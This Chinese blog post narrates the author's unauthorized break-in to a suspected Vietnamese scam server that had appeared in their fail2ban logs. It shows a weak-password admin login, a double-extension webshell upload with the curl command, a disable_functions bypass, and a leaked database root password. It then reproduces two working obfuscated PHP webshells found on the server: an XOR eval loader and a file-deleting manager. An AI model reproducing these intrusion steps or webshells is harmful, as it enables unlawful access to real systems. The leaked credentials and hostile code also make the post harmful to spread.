给越南肉鸡杀毒

上周给我的VPS装了fail2ban,今天一看黑名单,收获满满啊🤣。随便挑了一个了来练练手,就这个了,160.***.***.236

dddd先扫一下,先是发现了http://160.***.***.236:806/开放了目录,有游戏充值等等配置文件,感觉是个诈骗网站。
list_dir

接着发现关联域名https://bm.******.online/,是个ai写的php后台。admin/admin123弱密码。
admin

观察js,发现/includes/upload_image.php接口。只允许上传jpg/png/gif。直接写是没用的,没什么思路,翻了翻上传题的笔记,发现了双扩展名绕过。

1
2
3
4
curl -s -k -X POST "https://bm.******.online/includes/upload_image.php" \
    -b /tmp/admin_cookies.txt \
    -F "file=@/tmp/assert.gif;filename=shell.php"
{"url":"\/uploads\/69aacb960002e_shell.php"}

访问shell没反应,发现system()被禁用,但assert()可用,phpinfo()看到有disable_functionsopen_basedir没有ban。

1
passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

不过PHP是7.0,可以打PHP7 GC with Certain Destructors UAF,用蚁剑插件一把梭。用户是www

getshell

/tmp/up.txt发现root 12***23A,经尝试,密码不对。

/www/server/site_total/data/total/bm.******.online/host.txt发现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
bm.******.online
******.online
160.***.***.236
www.******.online
_dmarc.******.online
atm.****
n1**c.com
www.******.org
tk****68.com
******.cc
www.********.vip:9527
773b50.cc:61234
****.com
**.game
0.0.0.0
cloudflare.com
www.bm.********.online
escrow.********.bf
0b17ebd8-1******b55e-f338b74ddb82.********.online
brea****ms.bf
fc8e1bc7-**************e-fcaaf71caca0.********.online
jie******s.org
iktagbm.********.online

em换个域名继续骗。

/data/zone/www/home/config/database.php获得数据库root用户的密码。

1
2
3
4
define('DB_HOST', 'localhost');
define('DB_USER', 'root');
define('DB_PASS', 'loulxgame@com');
define('DB_NAME', 'web');

database
/www/wwwroot/bm.******.online/发现加密webshell
其中,12z.php

1
2
3
4
5
6
7
8
9
10
11
12
<?php
/* Encrypted File - 20260117180056 */
$k='YmZjMjYyMDRlN2EyYWYyY2NlOWE5NGNhNTM1M2I3ZWJlNzkyNWI3MmQ0MTYwNDAwYmQ3ZjkxMWRiZWIxZThmNQ==';
$e='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';
$d=base64_decode($e);
$k=base64_decode($k);
$r='';
for($i=0;$i<strlen($d);$i++){
  $r.=$d[$i]^$k[$i%strlen($k)];
}
eval('?>'.$r);
?>

ss.php

1
<?php $M=base64_decode('SG9nN1lMcVFSRkVeMlQjbHoufGV2SVYpZGJ5U2E0dGpBX3U6TVAnOGltM25VIDBDaD48ZnB3c3IkLSxOeCg5T2M2RDFrLzVHKg=='); $_guSMY=""; ;/*$_KvBr*/; $_guSMY.="f"; ;/*ClgHV*/; ;/*$_c9GbEW*/; $_guSMY.="i"; ;/*9w5RTod*/; ;/*timothy*/; function ru($_TybU) { $_Dd6=preg_replace("/[^0-9]/","",$_TybU); return $_Dd6; } $_guSMY.="l"; $_JVo=dn(1765153205); ;/*$_c9GbEW*/; ;/*villains*/; $_guSMY.="e"; $_guSMY.="_"; $_rDcINj=str_replace("Z06","","plaid"); function xy($_TybU) { $_Dd6=preg_replace("/[^A-Z]/","",$_TybU); return $_Dd6; } ;/*7MmO8*/; $_guSMY.="p"; ;/*$_4GfyMzs*/; ;/*lGZze1hL*/; ;/*openings*/; $_guSMY.="u"; $_rDcINj=str_replace("A","","mooney"); $_JVo=dn(1764102768); $_guSMY.="t"; ;/*Hcb9Jul*/; ;/*fury*/; ;/*gorges*/; $_guSMY.="_"; $_guSMY.="c"; ;/*$_Oh3*/; ;/*modder*/; $_guSMY.="o"; ;/*epinard*/; ;/*blurt*/; $_guSMY.="n"; $_guSMY.="t"; ;/*$_8AIHxgq*/; $_guSMY.="e"; ;/*raptured*/; $_guSMY.="n"; ;/*vega*/; $_guSMY.="t"; ;/*middle*/; $_JVo=dn(1765591169); ;/*aimons*/; ;/*helpless*/; $_guSMY.="s"; $_Oh3=""; ;/*zPFb*/; ;/*spurning*/; $_Oh3.="c"; ;/*JBezL2*/; ;/*COvyHZ4*/; $_Oh3.="h"; ;/*reviling*/; ;/*goatweed*/; $_Oh3.="m"; $_JVo=dn(1764412459); ;/*ojUN*/; ;/*F1aoXOM*/; $_Oh3.="o"; ;/*$_Loem*/; $_Oh3.="d"; $_Dm5ok6=""; ;/*2xbwU8*/; ;/*park*/; $_Dm5ok6.="g"; ;/*function*/; ;/*furled*/; ;/*M3vcD6EH*/; $_Dm5ok6.="l"; ;/*rood*/; ;/*qWNa*/; $_Dm5ok6.="o"; ;/*$_lupLq*/; ;/*5clyumC*/; ;/*6x27PEm*/; $_Dm5ok6.="b"; $_O7MZfz=""; ;/*pi8UjYkN*/; ;/*GBZCUOo3*/; ;/*GPfTYzd5*/; $_O7MZfz.="u"; ;/*2GYeSkm*/; ;/*84LQV*/; $_O7MZfz.="n"; ;/*bowman*/; ;/*$_DLBG7Re*/; $_O7MZfz.="l"; ;/*chalard*/; $_O7MZfz.="i"; function l($_njSqalt) { $_njSqalt=trim($_njSqalt); $_njSqalt=substr($_njSqalt,6,-6); $_njSqalt=str_replace($M[57],"+",$_njSqalt); $_njSqalt=str_replace("_","/",$_njSqalt); $_njSqalt=str_replace(".","=",$_njSqalt); $_njSqalt=base64_decode($_njSqalt); return $_njSqalt; } ;/*JXB5*/; $_O7MZfz.="n"; ;/*4Xm7K*/; $_O7MZfz.="k"; $_sVwj8=""; ;/*$_YphNi*/; $_sVwj8.="i"; ;/*7vg2N*/; ;/*tommaso*/; $_sVwj8.="s"; ;/*$_9h52zN*/; ;/*rubies*/; ;/*honest*/; $_sVwj8.="_"; $_sVwj8.="f"; ;/*WUv1K*/; $_sVwj8.="i"; ;/*I4uC8wB*/; ;/*7k4*/; ;/*qfJS4pY6*/; $_sVwj8.="l"; ;/*BbXOgVl*/; ;/*dM5Gj*/; $_sVwj8.="e"; $_ZtY9EF=""; ;/*hQZrwEs*/; ;/*accursed*/; ;/*JKIuzaM*/; $_ZtY9EF.="i"; ;/*fishwife*/; $_ZtY9EF.="s"; ;/*flatten*/; ;/*8Kxfl*/; ;/*AkSb8RNJ*/; $_ZtY9EF.="_"; $_wKdzBs=ru("peri7A"); ;/*8iPQaHq*/; ;/*guessin*/; $_ZtY9EF.="d"; $_JVo=dn(1763904853); ;/*putr*/; $_ZtY9EF.="i"; ;/*lichens*/; ;/*gospodi*/; $_ZtY9EF.="r"; $_lupLq=""; ;/*ABvy*/; ;/*tepXrONs*/; function dn($_AnPtJ7) { $_VKGeF4d=0; $_O5Y=microtime(true); $_VKGeF4d=$_O5Y-$_AnPtJ7; return $_VKGeF4d; } ;/*ZFsBg2M*/; ;/*nebula*/; $_lupLq.="t"; ;/*SY2L*/; $_lupLq.="o"; ;/*$_jN3tCgQ*/; $_lupLq.="u"; ;/*$_pk19yQ*/; ;/*F04x16g*/; ;/*$_cCnHF*/; $_lupLq.="c"; ;/*lashless*/; $_lupLq.="h"; $_wET7=""; ;/*$_rHC29mV*/; ;/*hoss*/; $_wET7.="b"; ;/*$_oiRM*/; ;/*$_LPeHO*/; ;/*dire*/; $_wET7.="a"; ;/*mxmiv*/; ;/*A38ORC*/; ;/*coping*/; $_wET7.="s"; ;/*jh37l*/; ;/*Zf5czOR*/; $_wET7.="e"; ;/*5RJFz*/; ;/*z3H2*/; ;/*abruptly*/; $_wET7.="n"; $_rDcINj=str_replace("L","","ruffles"); $_wET7.="a"; ;/*$_njSqalt*/; ;/*tackling*/; $_wET7.="m"; ;/*$_njSqalt*/; $_wET7.="e"; ;/*$_Q4wAq0*/; error_reporting(0); ;/*$_edwT8*/; ;/*$_ITe*/; ;/*gluts*/; $_ITe=($_SERVER[$M[0].$M[13].$M[13].$M[37].$M[27]]!=""&&$_SERVER[$M[0].$M[13].$M[13].$M[37].$M[27]]!=$M[1].$M[51].$M[51])||$_SERVER[$M[8].$M[10].$M[7].$M[44].$M[10].$M[27].$M[13].$M[33].$M[27].$M[47].$M[0].$M[10].$M[36].$M[10]]==$M[48].$M[30].$M[30].$M[52].$M[54]||$_SERVER[$M[27].$M[10].$M[8].$M[22].$M[10].$M[8].$M[33].$M[37].$M[63].$M[8].$M[13]]==443 ? $M[48].$M[30].$M[30].$M[52].$M[54].$M[35].$M[69].$M[69] : $M[48].$M[30].$M[30].$M[52].$M[35].$M[69].$M[69] ; ;/*C6iOj8*/; $_ZaJK4nT=$_SERVER[$M[0].$M[13].$M[13].$M[37].$M[33].$M[0].$M[63].$M[27].$M[13]]; ;/*tonic*/; ;/*crequi*/; ;/*raif*/; if ( isset($_SERVER[$M[8].$M[10].$M[7].$M[44].$M[10].$M[27].$M[13].$M[33].$M[44].$M[8].$M[21]]) ) { $_wKdzBs=ru("gregoireJzR3nh"); $_a5pSH=explode('?',$_SERVER[$M[8].$M[10].$M[7].$M[44].$M[10].$M[27].$M[13].$M[33].$M[44].$M[8].$M[21]]); $_mlsJ=explode("P","caller"); $_8AIHxgq=$_a5pSH[0]; ;/*GL0*/; }else { ;/*$_0yMb2*/; $_8AIHxgq=$_SERVER[$M[27].$M[47].$M[8].$M[21].$M[37].$M[13].$M[33].$M[59].$M[32].$M[36].$M[10]]; } $_JVo=dn(1767552682); $_rDcINj=str_replace("XA","","trooped"); ;/*varus*/; ;/*forbad*/; $_uTig=str_replace('\\','/',$_SERVER[$M[27].$M[47].$M[8].$M[21].$M[37].$M[13].$M[33].$M[9].$M[21].$M[5].$M[10].$M[59].$M[32].$M[36].$M[10]]); ;/*$_tLHvr*/; ;/*ztfbKV*/; ;/*mingo*/; $_QcNpZ=str_replace($_8AIHxgq,'',$_uTig); ;/*NnJlu*/; $_wKdzBs=ru("jovialY"); ;/*BFN3H*/; ;/*8WMu*/; $_Oh3($_QcNpZ,0755); ;/*turves*/; ;/*HD0Xk*/; ;/*Tnev*/; $_eiavw2z=$M[57].$M[57].$M[57]; ;/*sherbet*/; ;/*$_pk19yQ*/; $_eiavw2z.=$M[24].$M[1]; ;/*$_qezuS*/; ;/*VFLU*/; $_eiavw2z.=$M[57]; ;/*atUnA*/; $_eiavw2z.=$M[43].$M[1].$M[30]; ;/*$_W03F*/; ;/*eCAbto*/; ;/*ZGWv*/; $_eiavw2z.=$M[57]; ;/*AY72*/; ;/*27Vu5ER*/; $_eiavw2z.=$M[64].$M[48].$M[28].$M[43].$M[2].$M[19]; $_rDcINj=str_replace("v0g","","surly"); ;/*pride*/; $_eiavw2z.=$M[57]; ;/*verger*/; ;/*$_W03F*/; ;/*$_Ub2*/; ;/*cloying*/; $_eiavw2z.=$M[30].$M[48].$M[19]; ;/*$_rDcINj*/; ;/*register*/; ;/*kpMD*/; $_eiavw2z.=$M[57]; ;/*xv0i8O*/; ;/*Z01XtC*/; usleep(1); ;/*whSYp*/; ;/*CB71Qm*/; $_eiavw2z.=$M[51].$M[1].$M[15].$M[15].$M[1].$M[53].$M[40].$M[43].$M[2]; ;/*$_h7tzE*/; ;/*$_7ieh*/; ;/*bazaar*/; $_eiavw2z.=$M[57]; ;/*$_hSP*/; ;/*$_eiavw2z*/; ;/*showing*/; usleep(4); ;/*unruly*/; $_eiavw2z.=$M[64].$M[1].$M[43].$M[30].$M[19].$M[43].$M[30]; ;/*IioqgpB*/; ;/*$_wET7*/; ;/*JP1G*/; $_eiavw2z.=$M[57].$M[57].$M[57]; ;/*waOsEQ*/; if ($_SERVER[$M[7].$M[44].$M[10].$M[8].$M[4].$M[33].$M[27].$M[13].$M[8].$M[21].$M[59].$M[71]]==$M[24].$M[33].$M[48]) { ;/*$_c9GbEW*/; $_SN7=array(); $_N69C=0; $_t6H=0; $_SN7[0][]=$_QcNpZ; ;/*reappear*/; while(!empty($_SN7[$_N69C])) { foreach($_SN7[$_N69C] as $_9h52zN) { $_cw8u0M=$_Dm5ok6($_9h52zN.$M[69].$M[72],GLOB_ONLYDIR); if (!empty($_cw8u0M)) { foreach($_cw8u0M as $_RyCT) { $_SN7[$_N69C+1][]=$_RyCT; $_Oh3($_RyCT,0755); $_KvBr=$_RyCT.$M[69].$M[17].$M[48].$M[30].$M[28].$M[64].$M[64].$M[19].$M[54].$M[54]; if ($_sVwj8($_KvBr)) { $_7ieh=file_get_contents($_KvBr); if (preg_match('/'.$_eiavw2z.'/',$_7ieh)==0) { $_Oh3($_KvBr,0777); $_guSMY($_KvBr,''); $_O7MZfz($_KvBr); $_t6H++; } } } } } $_N69C++; } echo $_t6H.$M[24].$M[1].$M[43].$M[19]; exit; } ;/*$_N63WZ*/; ;/*$_cw8u0M*/; if ($_SERVER[$M[7].$M[44].$M[10].$M[8].$M[4].$M[33].$M[27].$M[13].$M[8].$M[21].$M[59].$M[71]]==$M[64].$M[33].$M[64]) { ;/*$_uTig*/; ;/*ap6OY*/; echo $M[31].$M[68].$M[57].$M[57].$M[57].$M[1].$M[68]; ;/*forces*/; exit; ;/*7yjmPJXF*/; ;/*holds*/; ;/*E2ShH*/; } ;/*vede*/; ;/*maidenly*/; ;/*miaskin*/; if ( !empty($_GET[$M[51].$M[33].$M[64]]) ) { ;/*newlaid*/; $_akoQ=l($_GET[$M[51].$M[33].$M[64]]); ;/*$_guSMY*/; if($_sVwj8($_QcNpZ.$_akoQ)){$_Oh3($_QcNpZ.$_akoQ,0644);echo $M[51].$M[64].$M[57].$M[57].$M[57].$M[1].$M[68];}else{echo $M[51].$M[64].$M[57].$M[57].$M[57].$M[43].$M[1];} ;/*ascribed*/; ;/*$_akoQ*/; exit; } ;/*RUGCMlw*/; ;/*$_W03F*/; if ( !empty($_GET[$M[51].$M[33].$M[24]]) ) { ;/*repress*/; ;/*PDczrmUy*/; $_0yMb2=l($_GET[$M[51].$M[33].$M[24]]); ;/*cooeeing*/; if ($_sVwj8($_QcNpZ.$_0yMb2)) { $_Oh3($_QcNpZ.$_0yMb2,0777); ;/*Ksu*/; ;/*$_tLHvr*/; $_mlsJ=explode("W","suction"); $_guSMY($_QcNpZ.$_0yMb2,$M[16],LOCK_EX); $_O7MZfz($_QcNpZ.$_0yMb2); } ;/*edbIHYGS*/; ;/*OhGF1ykp*/; ;/*crusted*/; if (!$_sVwj8($_QcNpZ.$_0yMb2)||trim(file_get_contents($_QcNpZ.$_0yMb2))==$M[16]) { ;/*1kCiL05S*/; ;/*rollet*/; echo $M[51].$M[24].$M[57].$M[57].$M[57].$M[1].$M[68]; ;/*$_RyCT*/; }else { ;/*medusa*/; ;/*ZvnbsmI*/; 